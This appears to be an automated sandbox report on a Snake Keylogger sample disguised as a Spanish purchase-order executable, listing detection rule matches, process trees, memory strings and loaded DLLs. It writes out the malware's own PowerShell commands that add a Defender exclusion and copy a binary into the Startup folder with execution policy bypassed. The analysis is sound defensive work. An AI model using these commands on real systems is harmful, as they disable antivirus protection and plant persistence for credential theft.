Source: NUEVA ORDEN DE COMPRAsxlx..exe, 00000003.00000000.1284029248.0000014F79FD2000.00000002.00000001.01000000.00000004.sdmp	Binary or memory string: OriginalFilenameNativeMethods.dll" vs NUEVA ORDEN DE COMPRAsxlx..exe
Source: NUEVA ORDEN DE COMPRAsxlx..exe, 00000003.00000000.1284029248.0000014F79FD2000.00000002.00000001.01000000.00000004.sdmp	Binary or memory string: OriginalFilenameOpuzucimibe8 vs NUEVA ORDEN DE COMPRAsxlx..exe
Source: NUEVA ORDEN DE COMPRAsxlx..exe	Binary or memory string: OriginalFilenameNativeMethods.dll" vs NUEVA ORDEN DE COMPRAsxlx..exe
Source: NUEVA ORDEN DE COMPRAsxlx..exe	Binary or memory string: OriginalFilenameOpuzucimibe8 vs NUEVA ORDEN DE COMPRAsxlx..exe

Source: 9.2.RegSvcs.exe.3a94698.3.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_DLInjector02 author = ditekSHen, description = Detects downloader injector
Source: 9.2.RegSvcs.exe.5160000.6.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_DLInjector02 author = ditekSHen, description = Detects downloader injector
Source: 9.2.RegSvcs.exe.3a94698.3.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_DLInjector02 author = ditekSHen, description = Detects downloader injector
Source: 9.2.RegSvcs.exe.2a55230.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_DLInjector02 author = ditekSHen, description = Detects downloader injector
Source: 9.2.RegSvcs.exe.5160000.6.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_DLInjector02 author = ditekSHen, description = Detects downloader injector
Source: 16.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 16.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 16.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 16.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 9.2.RegSvcs.exe.3b49528.5.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 9.2.RegSvcs.exe.3b49528.5.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 9.2.RegSvcs.exe.3b49528.5.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 9.2.RegSvcs.exe.3b49528.5.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 9.2.RegSvcs.exe.3b28af8.4.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 9.2.RegSvcs.exe.3b28af8.4.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 9.2.RegSvcs.exe.3b28af8.4.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 9.2.RegSvcs.exe.3b28af8.4.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 9.2.RegSvcs.exe.3b28af8.4.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 9.2.RegSvcs.exe.3b28af8.4.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 9.2.RegSvcs.exe.3b28af8.4.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 9.2.RegSvcs.exe.3b28af8.4.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 9.2.RegSvcs.exe.3b49528.5.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 9.2.RegSvcs.exe.3b49528.5.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 9.2.RegSvcs.exe.3b49528.5.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 9.2.RegSvcs.exe.3b49528.5.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 9.2.RegSvcs.exe.2a57a70.2.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_DLInjector02 author = ditekSHen, description = Detects downloader injector
Source: 00000009.00000002.1422193050.0000000005160000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_DLInjector02 author = ditekSHen, description = Detects downloader injector
Source: 00000009.00000002.1414987538.0000000003AE7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000009.00000002.1414987538.0000000003AE7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 00000010.00000002.2532294899.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000010.00000002.2532294899.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: Process Memory Space: RegSvcs.exe PID: 7924, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: RegSvcs.exe PID: 7924, type: MEMORYSTR	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: Process Memory Space: RegSvcs.exe PID: 8160, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: RegSvcs.exe PID: 8160, type: MEMORYSTR	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger

Source: 9.2.RegSvcs.exe.3b49528.5.raw.unpack, ---.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 9.2.RegSvcs.exe.3b49528.5.raw.unpack, ---.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 9.2.RegSvcs.exe.3b49528.5.raw.unpack, -.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 9.2.RegSvcs.exe.3b49528.5.raw.unpack, -.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 9.2.RegSvcs.exe.3b28af8.4.raw.unpack, ---.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 9.2.RegSvcs.exe.3b28af8.4.raw.unpack, ---.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 9.2.RegSvcs.exe.3b28af8.4.raw.unpack, -.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 9.2.RegSvcs.exe.3b28af8.4.raw.unpack, -.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 9.2.RegSvcs.exe.3a94698.3.raw.unpack, DarkListView.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 9.2.RegSvcs.exe.5160000.6.raw.unpack, DarkListView.cs	Cryptographic APIs: 'TransformFinalBlock'

Source: 9.2.RegSvcs.exe.3a94698.3.raw.unpack, DarkComboBox.cs	Base64 encoded string: 'Uwm+UuKGd614I69RzLI93aXq8M4plP4Fl8XGnAA54HkS/0jMOBsYAdDU3ufQvFFjYZJP0JeYZcnDYanLTNfb9IJuC/u1be1KdJkORevGYuzVlkHzJtU9FNAhjxyJAuY/'
Source: 9.2.RegSvcs.exe.5160000.6.raw.unpack, DarkComboBox.cs	Base64 encoded string: 'Uwm+UuKGd614I69RzLI93aXq8M4plP4Fl8XGnAA54HkS/0jMOBsYAdDU3ufQvFFjYZJP0JeYZcnDYanLTNfb9IJuC/u1be1KdJkORevGYuzVlkHzJtU9FNAhjxyJAuY/'

Source: classification engine

Classification label: mal100.spre.troj.adwa.spyw.expl.evad.winEXE@19/14@3/3

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exe

Jump to behavior

Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exe	Mutant created: NULL
Source: C:\Windows\System32\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7596
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8000:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7608:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7820:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8032:120:WilError_03

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jmuhjihw.amo.ps1

Jump to behavior

Source: NUEVA ORDEN DE COMPRAsxlx..exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: NUEVA ORDEN DE COMPRAsxlx..exe

Static file information: TRID: Win64 Executable Console Net Framework (206006/5) 48.58%

Source: C:\Users\user\Desktop\NUEVA ORDEN DE COMPRAsxlx..exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\NUEVA ORDEN DE COMPRAsxlx..exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: RegSvcs.exe, 00000010.00000002.2537070598.0000000002CD2000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000010.00000002.2537070598.0000000002D06000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000010.00000002.2537070598.0000000002CB4000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000010.00000002.2537070598.0000000002CC4000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000010.00000002.2540228139.0000000003AF3000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000010.00000002.2537070598.0000000002CFA000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: NUEVA ORDEN DE COMPRAsxlx..exe	Virustotal: Detection: 66%
Source: NUEVA ORDEN DE COMPRAsxlx..exe	ReversingLabs: Detection: 83%

Source: NUEVA ORDEN DE COMPRAsxlx..exe

String found in binary or memory: L

Source: C:\Users\user\Desktop\NUEVA ORDEN DE COMPRAsxlx..exe

File read: C:\Users\user\Desktop\NUEVA ORDEN DE COMPRAsxlx..exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\NUEVA ORDEN DE COMPRAsxlx..exe "C:\Users\user\Desktop\NUEVA ORDEN DE COMPRAsxlx..exe"
Source: C:\Users\user\Desktop\NUEVA ORDEN DE COMPRAsxlx..exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\NUEVA ORDEN DE COMPRAsxlx..exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\NUEVA ORDEN DE COMPRAsxlx..exe" -Force
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\NUEVA ORDEN DE COMPRAsxlx..exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
Source: C:\Users\user\Desktop\NUEVA ORDEN DE COMPRAsxlx..exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe"
Source: C:\Users\user\Desktop\NUEVA ORDEN DE COMPRAsxlx..exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "Powershell.exe" -ExecutionPolicy Bypass -command Copy-Item 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe' 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exe'
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\NUEVA ORDEN DE COMPRAsxlx..exe	Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 7596 -s 1620
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe"
Source: unknown	Process created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exe "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exe"
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\NUEVA ORDEN DE COMPRAsxlx..exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\NUEVA ORDEN DE COMPRAsxlx..exe" -Force	Jump to behavior
Source: C:\Users\user\Desktop\NUEVA ORDEN DE COMPRAsxlx..exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"	Jump to behavior
Source: C:\Users\user\Desktop\NUEVA ORDEN DE COMPRAsxlx..exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe"	Jump to behavior
Source: C:\Users\user\Desktop\NUEVA ORDEN DE COMPRAsxlx..exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "Powershell.exe" -ExecutionPolicy Bypass -command Copy-Item 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe' 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exe'	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe"	Jump to behavior

Source: C:\Users\user\Desktop\NUEVA ORDEN DE COMPRAsxlx..exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\NUEVA ORDEN DE COMPRAsxlx..exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\NUEVA ORDEN DE COMPRAsxlx..exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\NUEVA ORDEN DE COMPRAsxlx..exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\NUEVA ORDEN DE COMPRAsxlx..exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\NUEVA ORDEN DE COMPRAsxlx..exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\NUEVA ORDEN DE COMPRAsxlx..exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\NUEVA ORDEN DE COMPRAsxlx..exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\NUEVA ORDEN DE COMPRAsxlx..exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\NUEVA ORDEN DE COMPRAsxlx..exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\NUEVA ORDEN DE COMPRAsxlx..exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\NUEVA ORDEN DE COMPRAsxlx..exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\NUEVA ORDEN DE COMPRAsxlx..exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\NUEVA ORDEN DE COMPRAsxlx..exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\NUEVA ORDEN DE COMPRAsxlx..exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\NUEVA ORDEN DE COMPRAsxlx..exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\NUEVA ORDEN DE COMPRAsxlx..exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\NUEVA ORDEN DE COMPRAsxlx..exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\NUEVA ORDEN DE COMPRAsxlx..exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\NUEVA ORDEN DE COMPRAsxlx..exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\NUEVA ORDEN DE COMPRAsxlx..exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\NUEVA ORDEN DE COMPRAsxlx..exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\NUEVA ORDEN DE COMPRAsxlx..exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\NUEVA ORDEN DE COMPRAsxlx..exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\NUEVA ORDEN DE COMPRAsxlx..exe	Section loaded: virtdisk.dll	Jump to behavior
Source: C:\Users\user\Desktop\NUEVA ORDEN DE COMPRAsxlx..exe	Section loaded: fltlib.dll	Jump to behavior
Source: C:\Users\user\Desktop\NUEVA ORDEN DE COMPRAsxlx..exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\NUEVA ORDEN DE COMPRAsxlx..exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\NUEVA ORDEN DE COMPRAsxlx..exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\NUEVA ORDEN DE COMPRAsxlx..exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\NUEVA ORDEN DE COMPRAsxlx..exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\NUEVA ORDEN DE COMPRAsxlx..exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\NUEVA ORDEN DE COMPRAsxlx..exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: virtdisk.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fltlib.dll	Jump to behavior
